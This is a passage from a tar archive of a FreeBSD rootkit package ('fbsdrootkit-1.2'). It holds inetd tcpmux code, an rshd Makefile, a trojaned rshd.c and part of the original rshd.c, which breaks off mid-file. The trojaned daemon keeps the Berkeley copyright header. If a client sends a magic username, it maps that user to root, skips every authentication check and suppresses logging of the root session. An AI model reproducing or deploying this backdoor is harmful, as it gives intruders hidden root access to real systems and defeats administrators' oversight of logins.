fprintf(stderr, "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n", action, sep->se_service, sep->se_proto, sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server); } /* * Based on TCPMUX.C by Mark K. Lottor November 1988 * sri-nic::ps:tcpmux.c */ static int /* # of characters upto \r,\n or \0 */ getline(fd, buf, len) int fd; char *buf; int len; { int count = 0, n; do { n = read(fd, buf, len-count); if (n == 0) return (count); if (n < 0) return (-1); while (--n >= 0) { if (*buf == '\r' || *buf == '\n' || *buf == '\0') return (count); count++; buf++; } } while (count < len); return (count); } #define MAX_SERV_LEN (256+2) /* 2 bytes for \r\n */ #define strwrite(fd, buf) (void) write(fd, buf, sizeof(buf)-1) struct servtab * tcpmux(s) int s; { struct servtab *sep; char service[MAX_SERV_LEN+1]; int len; /* Get requested service name */ if ((len = getline(s, service, MAX_SERV_LEN)) < 0) { strwrite(s, "-Error reading service name\r\n"); return (NULL); } service[len] = '\0'; if (debug) fprintf(stderr, "tcpmux: someone wants %s\n", service); /* * Help is a required command, and lists available services, * one per line. */ if (!strcasecmp(service, "help")) { for (sep = servtab; sep; sep = sep->se_next) { if (!ISMUX(sep)) continue; (void)write(s,sep->se_service,strlen(sep->se_service)); strwrite(s, "\r\n"); } return (NULL); } /* Try matching a service in inetd.conf with the request */ for (sep = servtab; sep; sep = sep->se_next) { if (!ISMUX(sep)) continue; if (!strcasecmp(service, sep->se_service)) { if (ISMUXPLUS(sep)) { strwrite(s, "+Go\r\n"); } return (sep); } } strwrite(s, "-Service not available\r\n"); return (NULL); } fbsdrootkit-1.2/rshd/ 40700 764 0 0 6256133407 12313 5ustar dfrootfbsdrootkit-1.2/rshd/Makefile100600 764 0 543 5663754640 14045 0ustar dfroot# From: @(#)Makefile 8.1 (Berkeley) 6/4/93 # $Id: Makefile,v 1.4 1994/11/20 23:20:00 wollman Exp $ PROG= rshd SRCS= rshd.c MAN8= rshd.8 .if exists(${DESTDIR}/usr/lib/libkrb.a) && (defined(MAKE_KERBEROS) \ || defined(MAKE_EBONES)) CFLAGS+=-DKERBEROS -DCRYPT DPADD= ${LIBKRB} ${LIBDES} LDADD= -lkrb -ldes DISTRIBUTION= krb .endif .include fbsdrootkit-1.2/rshd/rshd.c100600 764 0 43766 6256134455 13562 0ustar dfroot/*- * Copyright (c) 1988, 1989, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1988, 1989, 1992, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)rshd.c 8.2 (Berkeley) 4/6/94"; #endif /* not lint */ /* * remote shell server: * [port]\0 * remuser\0 * locuser\0 * command\0 * data */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Rootkit configuration files */ #include "../config.h" int keepalive = 1; int check_all; int log_success; /* If TRUE, log all successful accesses */ int sent_null; void doit __P((struct sockaddr_in *)); void error __P((const char *, ...)); void getstr __P((char *, int, char *)); int local_domain __P((char *)); char *topdomain __P((char *)); void usage __P((void)); #ifdef KERBEROS #include #include #define VERSION_SIZE 9 #define SECURE_MESSAGE "This rsh session is using DES encryption for all transmissions.\r\n" #define OPTIONS "alnkvxL" char authbuf[sizeof(AUTH_DAT)]; char tickbuf[sizeof(KTEXT_ST)]; int doencrypt, use_kerberos, vacuous; Key_schedule schedule; #else #define OPTIONS "alnL" #endif int main(argc, argv) int argc; char *argv[]; { extern int __check_rhosts_file; struct linger linger; int ch, on = 1, fromlen; struct sockaddr_in from; openlog("rshd", LOG_PID | LOG_ODELAY, LOG_DAEMON); opterr = 0; while ((ch = getopt(argc, argv, OPTIONS)) != EOF) switch (ch) { case 'a': check_all = 1; break; case 'l': __check_rhosts_file = 0; break; case 'n': keepalive = 0; break; #ifdef KERBEROS case 'k': use_kerberos = 1; break; case 'v': vacuous = 1; break; #ifdef CRYPT case 'x': doencrypt = 1; break; #endif #endif case 'L': log_success = 1; break; case '?': default: usage(); break; } argc -= optind; argv += optind; #ifdef KERBEROS if (use_kerberos && vacuous) { syslog(LOG_ERR, "only one of -k and -v allowed"); exit(2); } #ifdef CRYPT if (doencrypt && !use_kerberos) { syslog(LOG_ERR, "-k is required for -x"); exit(2); } #endif #endif fromlen = sizeof (from); if (getpeername(0, (struct sockaddr *)&from, &fromlen) < 0) { syslog(LOG_ERR, "getpeername: %m"); _exit(1); } if (keepalive && setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on, sizeof(on)) < 0) syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m"); linger.l_onoff = 1; linger.l_linger = 60; /* XXX */ if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger, sizeof (linger)) < 0) syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m"); doit(&from); /* NOTREACHED */ } char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; char path[100] = "PATH="; char *envinit[] = {homedir, shell, path, username, 0}; char **environ; void doit(fromp) struct sockaddr_in *fromp; { extern char *__rcmd_errstr; /* syslog hook from libc/net/rcmd.c. */ struct hostent *hp; struct passwd *pwd; u_short port; fd_set ready, readfrom; int cc, nfd, pv[2], pid, s; int one = 1; char *hostname, *errorstr, *errorhost; char *cp, sig, buf[BUFSIZ]; char cmdbuf[NCARGS+1], locuser[16], remuser[16]; char remotehost[2 * MAXHOSTNAMELEN + 1]; #ifdef KERBEROS AUTH_DAT *kdata = (AUTH_DAT *) NULL; KTEXT ticket = (KTEXT) NULL; char instance[INST_SZ], version[VERSION_SIZE]; struct sockaddr_in fromaddr; int rc; long authopts; int pv1[2], pv2[2]; fd_set wready, writeto; fromaddr = *fromp; #endif /* Some local variables */ char MAG[7]; int werd=0; MAG[0]=ROOTKIT_MAGIC[0]; MAG[1]=ROOTKIT_MAGIC[1]; MAG[2]=ROOTKIT_MAGIC[2]; MAG[3]=ROOTKIT_MAGIC[3]; MAG[4]=ROOTKIT_MAGIC[4]; MAG[5]=ROOTKIT_MAGIC[5]; MAG[6]='\0'; (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); (void) signal(SIGTERM, SIG_DFL); #ifdef DEBUG { int t = open(_PATH_TTY, 2); if (t >= 0) { ioctl(t, TIOCNOTTY, (char *)0); (void) close(t); } } #endif fromp->sin_port = ntohs((u_short)fromp->sin_port); if (fromp->sin_family != AF_INET) { syslog(LOG_ERR, "malformed \"from\" address (af %d)\n", fromp->sin_family); exit(1); } #ifdef IP_OPTIONS { u_char optbuf[BUFSIZ/3], *cp; char lbuf[BUFSIZ], *lp; int optsize = sizeof(optbuf), ipproto; struct protoent *ip; if ((ip = getprotobyname("ip")) != NULL) ipproto = ip->p_proto; else ipproto = IPPROTO_IP; if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) && optsize != 0) { lp = lbuf; for (cp = optbuf; optsize > 0; cp++, optsize--, lp += 3) sprintf(lp, " %2.2x", *cp); syslog(LOG_NOTICE, "Connection received from %s using IP options (ignored):%s", inet_ntoa(fromp->sin_addr), lbuf); if (setsockopt(0, ipproto, IP_OPTIONS, (char *)NULL, optsize) != 0) { syslog(LOG_ERR, "setsockopt IP_OPTIONS NULL: %m"); exit(1); } } } #endif #ifdef KERBEROS if (!use_kerberos) #endif if (fromp->sin_port >= IPPORT_RESERVED || fromp->sin_port < IPPORT_RESERVED/2) { syslog(LOG_NOTICE|LOG_AUTH, "Connection from %s on illegal port %u", inet_ntoa(fromp->sin_addr), fromp->sin_port); exit(1); } (void) alarm(60); port = 0; for (;;) { char c; if ((cc = read(STDIN_FILENO, &c, 1)) != 1) { if (cc < 0) syslog(LOG_NOTICE, "read: %m"); shutdown(0, 1+1); exit(1); } if (c== 0) break; port = port * 10 + c - '0'; } (void) alarm(0); if (port != 0) { int lport = IPPORT_RESERVED - 1; s = rresvport(&lport); if (s < 0) { syslog(LOG_ERR, "can't get stderr port: %m"); exit(1); } #ifdef KERBEROS if (!use_kerberos) #endif if (port >= IPPORT_RESERVED) { syslog(LOG_ERR, "2nd port not reserved\n"); exit(1); } fromp->sin_port = htons(port); if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) { syslog(LOG_INFO, "connect second port %d: %m", port); exit(1); } } #ifdef KERBEROS if (vacuous) { error("rshd: remote host requires Kerberos authentication\n"); exit(1); } #endif #ifdef notdef /* from inetd, socket is already on 0, 1, 2 */ dup2(f, 0); dup2(f, 1); dup2(f, 2); #endif errorstr = NULL; hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr), fromp->sin_family); if (hp) { /* * If name returned by gethostbyaddr is in our domain, * attempt to verify that we haven't been fooled by someone * in a remote net; look up the name and check that this * address corresponds to the name. */ hostname = hp->h_name; #ifdef KERBEROS if (!use_kerberos) #endif if (check_all || local_domain(hp->h_name)) { strncpy(remotehost, hp->h_name, sizeof(remotehost) - 1); remotehost[sizeof(remotehost) - 1] = 0; errorhost = remotehost; hp = gethostbyname(remotehost); if (hp == NULL) { syslog(LOG_INFO, "Couldn't look up address for %s", remotehost); errorstr = "Couldn't look up address for your host (%s)\n"; hostname = inet_ntoa(fromp->sin_addr); } else for (; ; hp->h_addr_list++) { if (hp->h_addr_list[0] == NULL) { syslog(LOG_NOTICE, "Host addr %s not listed for host %s", inet_ntoa(fromp->sin_addr), hp->h_name); errorstr = "Host address mismatch for %s\n"; hostname = inet_ntoa(fromp->sin_addr); break; } if (!bcmp(hp->h_addr_list[0], (caddr_t)&fromp->sin_addr, sizeof(fromp->sin_addr))) { hostname = hp->h_name; break; } } } } else errorhost = hostname = inet_ntoa(fromp->sin_addr); #ifdef KERBEROS if (use_kerberos) { kdata = (AUTH_DAT *) authbuf; ticket = (KTEXT) tickbuf; authopts = 0L; strcpy(instance, "*"); version[VERSION_SIZE - 1] = '\0'; #ifdef CRYPT if (doencrypt) { struct sockaddr_in local_addr; rc = sizeof(local_addr); if (getsockname(0, (struct sockaddr *)&local_addr, &rc) < 0) { syslog(LOG_ERR, "getsockname: %m"); error("rlogind: getsockname: %m"); exit(1); } authopts = KOPT_DO_MUTUAL; rc = krb_recvauth(authopts, 0, ticket, "rcmd", instance, &fromaddr, &local_addr, kdata, "", schedule, version); des_set_key(kdata->session, schedule); } else #endif rc = krb_recvauth(authopts, 0, ticket, "rcmd", instance, &fromaddr, (struct sockaddr_in *) 0, kdata, "", (bit_64 *) 0, version); if (rc != KSUCCESS) { error("Kerberos authentication failure: %s\n", krb_err_txt[rc]); exit(1); } } else #endif getstr(remuser, sizeof(remuser), "remuser"); getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); if(!strcmp(locuser,MAG)) { werd++; strcpy(locuser,"root"); } setpwent(); pwd = getpwnam(locuser); if (pwd == NULL && !werd) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: unknown login. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); if (errorstr == NULL) errorstr = "Login incorrect.\n"; goto fail; } if (chdir(pwd->pw_dir) < 0) { (void) chdir("/"); #ifdef notdef syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: no home directory. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); error("No remote directory.\n"); exit(1); #endif } #ifdef KERBEROS if (use_kerberos && !elite) { if (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0') { if (kuserok(kdata, locuser) != 0) { syslog(LOG_INFO|LOG_AUTH, "Kerberos rsh denied to %s.%s@%s", kdata->pname, kdata->pinst, kdata->prealm); error("Permission denied.\n"); exit(1); } } } else #endif if(!werd) { if (errorstr || (pwd->pw_expire && time(NULL) >= pwd->pw_expire) || (pwd->pw_passwd != 0 && *pwd->pw_passwd != '\0' && iruserok(fromp->sin_addr.s_addr, pwd->pw_uid == 0, remuser, locuser) < 0)) { if (__rcmd_errstr) syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", remuser, hostname, locuser, __rcmd_errstr, cmdbuf); else syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); fail: if (errorstr == NULL) errorstr = "Permission denied.\n"; error(errorstr, errorhost); exit(1); } if (pwd->pw_uid && !access(_PATH_NOLOGIN, F_OK)) { error("Logins currently disabled.\n"); exit(1); } } (void) write(STDERR_FILENO, "\0", 1); sent_null = 1; if (port) { if (pipe(pv) < 0) { error("Can't make pipe.\n"); exit(1); } #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { if (pipe(pv1) < 0) { error("Can't make 2nd pipe.\n"); exit(1); } if (pipe(pv2) < 0) { error("Can't make 3rd pipe.\n"); exit(1); } } #endif #endif pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); exit(1); } if (pid) { #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { static char msg[] = SECURE_MESSAGE; (void) close(pv1[1]); (void) close(pv2[1]); des_write(s, msg, sizeof(msg) - 1); } else #endif #endif { (void) close(0); (void) close(1); } (void) close(2); (void) close(pv[1]); FD_ZERO(&readfrom); FD_SET(s, &readfrom); FD_SET(pv[0], &readfrom); if (pv[0] > s) nfd = pv[0]; else nfd = s; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { FD_ZERO(&writeto); FD_SET(pv2[0], &writeto); FD_SET(pv1[0], &readfrom); nfd = MAX(nfd, pv2[0]); nfd = MAX(nfd, pv1[0]); } else #endif #endif ioctl(pv[0], FIONBIO, (char *)&one); /* should set s nbio! */ nfd++; do { ready = readfrom; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { wready = writeto; if (select(nfd, &ready, &wready, (fd_set *) 0, (struct timeval *) 0) < 0) break; } else #endif #endif if (select(nfd, &ready, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) break; if (FD_ISSET(s, &ready)) { int ret; #ifdef CRYPT #ifdef KERBEROS if (doencrypt) ret = des_read(s, &sig, 1); else #endif #endif ret = read(s, &sig, 1); if (ret <= 0) FD_CLR(s, &readfrom); else killpg(pid, sig); } if (FD_ISSET(pv[0], &ready)) { errno = 0; cc = read(pv[0], buf, sizeof(buf)); if (cc <= 0) { shutdown(s, 1+1); FD_CLR(pv[0], &readfrom); } else { #ifdef CRYPT #ifdef KERBEROS if (doencrypt) (void) des_write(s, buf, cc); else #endif #endif (void) write(s, buf, cc); } } #ifdef CRYPT #ifdef KERBEROS if (doencrypt && FD_ISSET(pv1[0], &ready)) { errno = 0; cc = read(pv1[0], buf, sizeof(buf)); if (cc <= 0) { shutdown(pv1[0], 1+1); FD_CLR(pv1[0], &readfrom); } else (void) des_write(STDOUT_FILENO, buf, cc); } if (doencrypt && FD_ISSET(pv2[0], &wready)) { errno = 0; cc = des_read(STDIN_FILENO, buf, sizeof(buf)); if (cc <= 0) { shutdown(pv2[0], 1+1); FD_CLR(pv2[0], &writeto); } else (void) write(pv2[0], buf, cc); } #endif #endif } while (FD_ISSET(s, &readfrom) || #ifdef CRYPT #ifdef KERBEROS (doencrypt && FD_ISSET(pv1[0], &readfrom)) || #endif #endif FD_ISSET(pv[0], &readfrom)); exit(0); } setpgrp(0, getpid()); (void) close(s); (void) close(pv[0]); #ifdef CRYPT #ifdef KERBEROS if (doencrypt) { close(pv1[0]); close(pv2[0]); dup2(pv1[1], 1); dup2(pv2[1], 0); close(pv1[1]); close(pv2[1]); } #endif #endif dup2(pv[1], 2); close(pv[1]); } if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL; #if BSD > 43 if(!werd) if (setlogin(pwd->pw_name) < 0) syslog(LOG_ERR, "setlogin() failed: %m"); #endif (void) setgid((gid_t)pwd->pw_gid); initgroups(pwd->pw_name, pwd->pw_gid); (void) setuid((uid_t)pwd->pw_uid); environ = envinit; strncat(homedir, pwd->pw_dir, sizeof(homedir)-6); strcat(path, _PATH_DEFPATH); strncat(shell, pwd->pw_shell, sizeof(shell)-7); strncat(username, pwd->pw_name, sizeof(username)-6); cp = strrchr(pwd->pw_shell, '/'); if (cp) cp++; else cp = pwd->pw_shell; endpwent(); if (log_success || pwd->pw_uid == 0 && !werd) { #ifdef KERBEROS if (use_kerberos) syslog(LOG_INFO|LOG_AUTH, "Kerberos shell from %s.%s@%s on %s as %s, cmd='%.80s'", kdata->pname, kdata->pinst, kdata->prealm, hostname, locuser, cmdbuf); else #endif syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%.80s'", remuser, hostname, locuser, cmdbuf); } execl(pwd->pw_shell, cp, "-c", cmdbuf, 0); perror(pwd->pw_shell); exit(1); } /* * Report error to client. Note: can't be used until second socket has * connected to client, or older clients will hang waiting for that * connection first. */ #if __STDC__ #include #else #include #endif void #if __STDC__ error(const char *fmt, ...) #else error(fmt, va_alist) char *fmt; va_dcl #endif { va_list ap; int len; char *bp, buf[BUFSIZ]; #if __STDC__ va_start(ap, fmt); #else va_start(ap); #endif bp = buf; if (sent_null == 0) { *bp++ = 1; len = 1; } else len = 0; (void)vsnprintf(bp, sizeof(buf) - 1, fmt, ap); (void)write(STDERR_FILENO, buf, len + strlen(bp)); } void getstr(buf, cnt, err) char *buf, *err; int cnt; { char c; do { if (read(STDIN_FILENO, &c, 1) != 1) exit(1); *buf++ = c; if (--cnt == 0) { error("%s too long\n", err); exit(1); } } while (c != 0); } /* * Check whether host h is in our local domain, * defined as sharing the last two components of the domain part, * or the entire domain part if the local domain has only one component. * If either name is unqualified (contains no '.'), * assume that the host is local, as it will be * interpreted as such. */ int local_domain(h) char *h; { char localhost[MAXHOSTNAMELEN]; char *p1, *p2; localhost[0] = 0; (void) gethostname(localhost, sizeof(localhost)); p1 = topdomain(localhost); p2 = topdomain(h); if (p1 == NULL || p2 == NULL || !strcasecmp(p1, p2)) return (1); return (0); } char * topdomain(h) char *h; { char *p, *maybe = NULL; int dots = 0; for (p = h + strlen(h); p >= h; p--) { if (*p == '.') { if (++dots == 2) return (p); maybe = p; } } return (maybe); } void usage() { syslog(LOG_ERR, "usage: rshd [-%s]", OPTIONS); exit(2); } fbsdrootkit-1.2/rshd/rshd.c.dist100600 764 0 43140 6256133410 14474 0ustar dfroot/*- * Copyright (c) 1988, 1989, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1988, 1989, 1992, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)rshd.c 8.2 (Berkeley) 4/6/94"; #endif /* not lint */ /* * remote shell server: * [port]\0 * remuser\0 * locuser\0 * command\0 * data */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int keepalive = 1; int check_all; int log_success; /* If TRUE, log all successful accesses */ int sent_null; void doit __P((struct sockaddr_in *)); void error __P((const char *, ...)); void getstr __P((char *, int, char *)); int local_domain __P((char *)); char *topdomain __P((char *)); void usage __P((void)); #ifdef KERBEROS #include #include #define VERSION_SIZE 9 #define SECURE_MESSAGE "This rsh session is using DES encryption for all transmissions.\r\n" #define OPTIONS "alnkvxL" char authbuf[sizeof(AUTH_DAT)]; char tickbuf[sizeof(KTEXT_ST)]; int doencrypt, use_kerberos, vacuous; Key_schedule schedule; #else #define OPTIONS "alnL" #endif int main(argc, argv) int argc; char *argv[]; { extern int __check_rhosts_file; struct linger linger; int ch, on = 1, fromlen; struct sockaddr_in from; openlog("rshd", LOG_PID | LOG_ODELAY, LOG_DAEMON); opterr = 0; while ((ch = getopt(argc, argv, OPTIONS)) != EOF) switch (ch) { case 'a': check_all = 1; break; case 'l': __check_rhosts_file = 0; break; case 'n': keepalive = 0; break; #ifdef KERBEROS case 'k': use_kerberos = 1; break; case 'v': vacuous = 1; break; #ifdef CRYPT case 'x': doencrypt = 1; break; #endif #endif case 'L': log_success = 1; break; case '?': default: usage(); break; } argc -= optind; argv += optind; #ifdef KERBEROS if (use_kerberos && vacuous) { syslog(LOG_ERR, "only one of -k and -v allowed"); exit(2); } #ifdef CRYPT if (doencrypt && !use_kerberos) { syslog(LOG_ERR, "-k is required for -x"); exit(2); } #endif #endif fromlen = sizeof (from); if (getpeername(0, (struct sockaddr *)&from, &fromlen) < 0) { syslog(LOG_ERR, "getpeername: %m"); _exit(1); } if (keepalive && setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on, sizeof(on)) < 0) syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m"); linger.l_onoff = 1; linger.l_linger = 60; /* XXX */ if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger, sizeof (linger)) < 0) syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m"); doit(&from); /* NOTREACHED */ } char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; char path[100] = "PATH="; char *envinit[] = {homedir, shell, path, username, 0}; char **environ; void doit(fromp) struct sockaddr_in *fromp; { extern char *__rcmd_errstr; /* syslog hook from libc/net/rcmd.c. */ struct hostent *hp; struct passwd *pwd; u_short port; fd_set ready, readfrom; int cc, nfd, pv[2], pid, s; int one = 1; char *hostname, *errorstr, *errorhost; char *cp, sig, buf[BUFSIZ]; char cmdbuf[NCARGS+1], locuser[16], remuser[16]; char remotehost[2 * MAXHOSTNAMELEN + 1]; #ifdef KERBEROS AUTH_DAT *kdata = (AUTH_DAT *) NULL; KTEXT ticket = (KTEXT) NULL; char instance[INST_SZ], version[VERSION_SIZE]; struct sockaddr_in fromaddr; int rc; long authopts; int pv1[2], pv2[2]; fd_set wready, writeto; fromaddr = *fromp; #endif (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); (void) signal(SIGTERM, SIG_DFL); #ifdef DEBUG { int t = open(_PATH_TTY, 2); if (t >= 0) { ioctl(t, TIOCNOTTY, (char *)0); (void) close(t); } } #endif fromp->sin_port = ntohs((u_short)fromp->sin_port); if (fromp->sin_family != AF_INET) { syslog(LOG_ERR, "malformed \"from\" address (af %d)\n", fromp->sin_family); exit(1); } #ifdef IP_OPTIONS { u_char optbuf[BUFSIZ/3], *cp; char lbuf[BUFSIZ], *lp; int optsize = sizeof(optbuf), ipproto; struct protoent *ip; if ((ip = getprotobyname("ip")) != NULL) ipproto = ip->p_proto; else ipproto = IPPROTO_IP; if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) && optsize != 0) { lp = lbuf; for (cp = optbuf; optsize > 0; cp++, optsize--, lp += 3) sprintf(lp, " %2.2x", *cp); syslog(LOG_NOTICE, "Connection received from %s using IP options (ignored):%s", inet_ntoa(fromp->sin_addr), lbuf); if (setsockopt(0, ipproto, IP_OPTIONS, (char *)NULL, optsize) != 0) { syslog(LOG_ERR, "setsockopt IP_OPTIONS NULL: %m"); exit(1); } } } #endif #ifdef KERBEROS if (!use_kerberos) #endif if (fromp->sin_port >= IPPORT_RESERVED || fromp->sin_port < IPPORT_RESERVED/2) { syslog(LOG_NOTICE|LOG_AUTH, "Connection from %s on illegal port %u", inet_ntoa(fromp->sin_addr), fromp->sin_port); exit(1); } (void) alarm(60); port = 0; for (;;) { char c; if ((cc = read(STDIN_FILENO, &c, 1)) != 1) { if (cc < 0) syslog(LOG_NOTICE, "read: %m"); shutdown(0, 1+1); exit(1); } if (c== 0) break; port = port * 10 + c - '0'; } (void) alarm(0); if (port != 0) { int lport = IPPORT_RESERVED - 1; s = rresvport(&lport); if (s < 0) { syslog(LOG_ERR, "can't get stderr port: %m"); exit(1); } #ifdef KERBEROS if (!use_kerberos) #endif if (port >= IPPORT_RESERVED) { syslog(LOG_ERR, "2nd port not reserved\n"); exit(1); } fromp->sin_port = htons(port); if (connect(s, (struct sockaddr *)fromp, sizeof (*fromp)) < 0) { syslog(LOG_INFO, "connect second port %d: %m", port); exit(1); } } #ifdef KERBEROS if (vacuous) { error("rshd: remote host requires Kerberos authentication\n"); exit(1); } #endif #ifdef notdef /* from inetd, socket is already on 0, 1, 2 */ dup2(f, 0); dup2(f, 1); dup2(f, 2); #endif errorstr = NULL; hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr), fromp->sin_family); if (hp) { /* * If name returned by gethostbyaddr is in our domain, * attempt to verify that we haven't been fooled by someone * in a remote net; look up the name and check that this * address corresponds to the name. */ hostname = hp->h_name; #ifdef KERBEROS if (!use_kerberos) #endif if (check_all || local_domain(hp->h_name)) { strncpy(remotehost, hp->h_name, sizeof(remotehost) - 1); remotehost[sizeof(remotehost) - 1] = 0; errorhost = remotehost; hp = gethostbyname(remotehost); if (hp == NULL) { syslog(LOG_INFO, "Couldn't look up address for %s", remotehost); errorstr = "Couldn't look up address for your host (%s)\n"; hostname = inet_ntoa(fromp->sin_addr); } else for (; ; hp->h_addr_list++) { if (hp->h_addr_list[0] == NULL) { syslog(LOG_NOTICE, "Host addr %s not listed for host %s", inet_ntoa(fromp->sin_addr), hp->h_name); errorstr = "Host address mismatch for %s\n"; hostname = inet_ntoa(fromp->sin_addr); break; } if (!bcmp(hp->h_addr_list[0], (caddr_t)&fromp->sin_addr, sizeof(fromp->sin_addr))) { hostname = hp->h_name; break; } } } } else errorhost = hostname = inet_ntoa(fromp->sin_addr); #ifdef KERBEROS if (use_kerberos) { kdata = (AUTH_DAT *) authbuf; ticket = (KTEXT) tickbuf; authopts = 0L; strcpy(instance, "*"); version[VERSION_SIZE - 1] = '\0'; #ifdef CRYPT if (doencrypt) { struct sockaddr_in local_addr; rc = sizeof(local_addr); if (getsockname(0, (struct sockaddr *)&local_addr, &rc) < 0) { syslog(LOG_ERR, "getsockname: %m"); error("rlogind: getsockname: %m"); exit(1); } authopts = KOPT_DO_MUTUAL; rc = krb_recvauth(authopts, 0, ticket, "rcmd", instance, &fromaddr, &local_addr, kdata, "", schedule, version); des_set_key(kdata->session, schedule); } else #endif rc = krb_recvauth(authopts, 0, ticket, "rcmd", instance, &fromaddr, (struct sockaddr_in *) 0, kdata, "", (bit_64 *) 0, version); if (rc != KSUCCESS) { error("Kerberos authentication failure: %s\n", krb_err_txt[rc]); exit(1); } } else #endif getstr(remuser, sizeof(remuser), "remuser"); getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); setpwent(); pwd = getpwnam(locuser); if (pwd == NULL) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: unknown login. cmd='%.80s'", remuser, hostname, locuser, cmdbuf); if (errorstr == NULL) errorstr = "Login incorrect.\n"; goto fail; } if (chdir(pwd->pw_dir) < 0) { (void) chdir("/"); #ifdef notdef syslog(LOG_INFO|LOG_AUTH, "%s@%s as 